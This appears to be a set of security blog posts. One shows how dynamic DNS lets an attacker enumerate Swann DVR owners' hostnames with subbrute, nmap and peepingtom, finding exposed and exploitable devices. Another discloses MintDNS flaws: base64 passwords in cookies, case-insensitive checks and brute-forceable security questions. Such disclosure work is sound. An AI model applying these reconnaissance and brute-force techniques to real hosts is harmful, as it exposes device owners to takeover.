         44:c7:5d:e3:fa:5c:83:01:82:03:d5:10:74:17:0b:ed:4d:2f:
         4a:72:2e:63:6d:78:7d:2f:dc:62:8d:72:f8:96:05:61:ea:36:
         a4:b3:81:24:1e:62:12:04:48:f6:d1:ca:27:66:54:94:ec:24:
         ad:c3:aa:1a:e1:90:1c:f9:5c:ae:0e:ba:c9:94:fe:30:75:50:
         c1:a3:69:8f:13:25:8f:b1:81:45:08:b9:30:3d:26:9a:0a:6e:
         bc:74:97:6e:fb:2d:5f:86:21:b5:0c:b1:a0:47:e5:95:d4:24:
         8f:f8:ad:52:0b:a6:f7:54:f8:17:06:26:1e:57:47:36:48:49:
         a8:c6:50:a0:69:4a:c2:8f:35:5c:73:cd:5b:a7:d6:14:e3:30:
         c6:61:a0:dc:a2:c9:14:67:01:d3:f2:c6:bc:52:44:0e:bb:fc:
         60:69:c1:28:63:f7:9b:d6:f9:4c:d9:b7:3a:21:2c:93:7b:8c:
         e7:f8:ab:62:3c:be:19:d0:e0:94:86:58:71:b7:4f:a5:f6:a3:
         16:f8:0a:61

As you can see – there is no notion of my signature in there. The email of cybergibbon@test.com has been altered to cybergibbons@test.com by the CA. This is because my registered email is cybergibbons@test.com.

It’s not very important, but I was initially excited when the CA returned a certificate for an email which I wasn’t registered with as it could have led to an interesting vulnerability. It’s important to note that a certificate issued by a CA can be done so without the owner of the public key being aware.

cdraw

Why dynamic DNS is a bad idea for the Internet of Things

Dynamic DNS has been around for a good while now, allowing users who have dynamic IPs (or even those with static IPs, no DNS, and bad memory) to use a hostname of their dynamic DNS provider to point towards their home IP.

Dynamic DNS makes it easier for a user to connect back to their home IP and interact with devices in their network. It provides a mapping between a constant hostname (e.g. cybergibbons.swanndvr.net) and your IP (82.158.226.34).

A device on your network (maybe your router, often a specific device) periodically communicates your IP to the dynamic DNS service. The domain name resolution changes as your IP changes. This means that if your IP changes, you can still connect to your home network using the constant hostname.

Simply knowing the IP is not enough – you need to be able to acutally connect to the devices. Normally a home router has a firewall set to reject nearly all incoming traffic. A user needs to punch a hole through the firewall, often using something called port-forwarding.

This exposes a device on your private network to the wider Internet. You are no longer using the security of your router’s firewall, but depending on the security of the device you have exposed.

Devices like IP CCTV cameras, network/digital video recorders, thermostats, and home automation hubs often rely on this combination of port-forwarding and dynamic DNS.

For example, a lot of Swann DVRs recommend you port-forward port 85 from your router back to your DVR. Swann then runs their own dynamic DNS service, which the DVR can be configured to communicate with.

Sounds like a great idea, doesn’t it? Users can easily connect back to their IoT devices from outside their home.

Unfortunately, dynamic DNS, especially when it is provided by deivice manufacturers, is generally a bad idea.

Why?

Finding hostnames

Each user that uses dynamic DNS has a unique subdomain – e.g. cybergibbons.swanndvr.net – try it using nslookup:
Screen Shot 2015-06-04 at 23.01.15

(no, that’s not my own IP)

Now try something that doesn’t exist:

Screen Shot 2015-06-04 at 23.04.53

And you can see we get no response (as long as no-one registers that domain after I publish this…)

We can do this as a bulk operation, using a large wordlist and a tool called subbrute. This tool is commonly used during the discovery phase of a pen test to find new hosts. Subbrute uses a wide array of DNS servers rather than just your own one, allowing it run quicker and with lower risk of rate limiting.

It’s important to note that the operator of swanndvr.net is highly unlikely to notice someone brute-forcing sub-domains like this. They might see a slightly higher rate than average of lookups as new DNS servers end up having to make recursive requests for their authoritive records. But the attacker’s IP will remain entirely hidden. The dynamic DNS users will see nothing at all from this attack.

The wordlist required for this application differs to a typical host wordlist. We don’t want to find ftp, dev1, vpn, etc. We want to find optus, redrover, zion, pchome, concordia. These are closer to usernames than normal hostnames. I used a custom list of usernames and hostnames built up over the last few years for this, but other sources like fuzzdb and SecLists are good starting points.

Running subbrute against swanndvr.net quickly got me a list of 2401 valid hostnames. I’m sure a longer wordlist would reveal more hostnames, but 2401 is enough for this.

Scanning hosts for webservices

Given that swanndvr.net is intended to be used by people who own Swann products, I though I would concentrate on ports that Swann products commonly use. This includes the typical port 80 (HTTP), port 443 (HTTPS), but also 85 (a lot of Swann products run HTTP on this port).

Let’s fire up nmap:

nmap -vv -Pn -iL swann_hosts.txt -T5 -p80,85,443 --open -oA nmap_swann | tee nmap_swann.txt
  •  -vv – verbose output
  • -Pn – don’t ping check host first
  • -iL swann_hosts.txt – take this file as the input
  • -T5 – scan fast
  • -p80,85,443 – scan ports 80, 85 and 443
  • –open – only show open ports
  • -oA nmap_swann – output in greppable, nmap and xml files
  • tee nmap_swann.txt – console to a text file

This scan will run quickly – we are only trying three ports on (mainly) consumer routers, so there is little risk of anything clamming up with the fast scan.

After this, we have 335 hosts running something on one of these three ports. That’s a lot of hosts to check manually. I won’t post the results here as it is likely transient.

Screengrabbing hosts

Luckily there is a tool that is designed to take a list of hosts/services and grab a screenshot of each one. It’s called peepingtom. It uses a library called PhantomJS to render the webpages, save a screenshot and the source, and present it in a nice HTML file. It also works with nmap output files.

At the moment, there are no binaries available for PhantomJS, so you will need to build it yourself under Linux. This takes quite a while.

Running peepingtom is very simple, but it doesn’t, by default, treat port 85 as HTTP. We need to edit the peepingtom.py file. In the function parseNmap, add 85 to the http_ports:
Screen Shot 2015-06-05 at 09.21.46

Now we run peepingtom:

./peepingtom.py -x nmap_swann.xml

It will take quite a while to run. Peepingtom won’t do anything complex with JavaScript, redirects, Flash etc. so some of the results will be basic, but it’s easy enough to confirm the interesting results in a browser.

What do we find?

Lots of IIS, generally vulnerable to MS15-034 (27/335 hosts running IIS, 21 vulnerable). I guess people into DVRs like tinkering with IT and forgetting about what they are running.

httpbscswanndvrnet80

Lots of DVRs, which may (or may not) use default (or no) credentials.

httpworcesterswanndvrnet80

httpcometswanndvrnet80

Some IP cameras:

httpsgccswanndvrnet443

Lots and lots of modems and routers, some with no login credentials at all.

In fact, it looks like about 85 hosts are running DVRs, and about 30 of these have an easy to exploit vulnerability that I found a few months back (responsible disclosure ongoing…) that results in root access to a fairly powerful embedded Linux box.

Scanning hosts for other typically insecure services

Going back for another nmap scan, this time on 21 (FTP), 22 (SSH), 23 (Telnet) and 25 (SMTP), we find even more hosts running services. Telnet is very popular.

Conclusion

So what is the issue here?

Dynamic DNS gives me a very easy way of identifying hosts that run multiple, likely insecure services/devices including those made by specific manufacturers.

These IoT devices nearly always have some vulnerabilities and very rarely receive any firmware updates to fix them.

It’s like a big flag shouting “hack me”!

I could take over 30 DVRs just from this small amount of work and use them for whatever I want.

It would take me much longer to scan the entire IPv4 address space to find these specific devices.

What’s the solution? Stop relying on port-forwarding to allow connectivity to your devices. If you need to, make them secure and don’t allow default credentials!

 

MintDNS dynamic DNS software – multiple vulnerabilities

MintDNS is a piece of software used to provide dynamic DNS services. It runs under Windows, and I can find ~50 different CCTV/NVR providers using it.

I’ve only had a very quick check of this piece of software, but it appears to suffer from multiple, fairly serious, vulnerabilities.

User input validation is performed client side

There are a number of checks on things like password length done client side. These can easily be bypassed by setting values directly in requests. For example, custom security questions can be set, and empty passwords.

Passwords stored in the plain

The database stores passwords, encoded as base64, in the Admin and Users tables:

Users table

Users table

Admin table

Admin table

dGVzdHBhc3M= is “testpass”

It is not advised or forgiveable to store passwords in the plain anymore.

Passwords stored in the plain in a cookie

When logging in, the base64 password is stored in the plain in a cookie.

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /devices.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DDNS=user=a@test.com&pass=dGVzdHBhc3M=; expires=Fri, 05-Jun-2015 14:25:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 04 Jun 2015 14:25:24 GMT
Content-Length: 132

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fdevices.aspx">here</a>.</h2>
</body></html>

There really is no excuse for this either. This is what session tokens are for.

Password check from cookie is case-insensitive

Each time a page is viewed, the password is checked from the cookie. Because the database stores the password in base64 and the cookie is in base64, they are directly compared.

However, this is done in SQL which is by default case-insensitive.

This means that the base64 string of dGVzdHBhc3M= (testpass) is just as valid as DgvZDhbHC3m= or any of the other variations.

No password brute-force protection on cookie

Whilst the login form has brute-force protection (“FloodCheck”), the cookie doesn’t have any brute-force protection. You can just chug through passwords as quickly as you like.

Brute-force cookie password - long response indicates success

Brute-force cookie password – long response indicates success

A lack of brute-force protection is common on cookie values, but usually the token is a lengthy session token with enough entropy to mean this is not an issue.

Password reset is insecure

On attempting to reset a password, the first step is to provide the email address.

Once this is done, you are presented with a security question:
Security question

This has no brute-force protection in the form of lockout or captcha, so off we go with a brute-force attack – against something that has a lot lower entropy than a password. I’d wager that a list of 100 common foods, 100 common cities and common phone number formats would yield a vast majority of accounts.

But when we get the question right, how does it deal with it?

Cookie with original password

That’s right! It puts the original password into the cookie, base64 encoded!

Conclusion

I stopped looking at this point. MintDNS has enough issues that I wouldn’t use it. Reviewing the .aspx files indicate to me that the development is ad-hoc and a bit naive. The website doesn’t really indicate that the software has been updated in the last 5 years.

I found a couple of instances where user input was reflected back in the response, but there are basic XSS checks combined with the IIS/ASP checks, so it did not appear to be exploitable.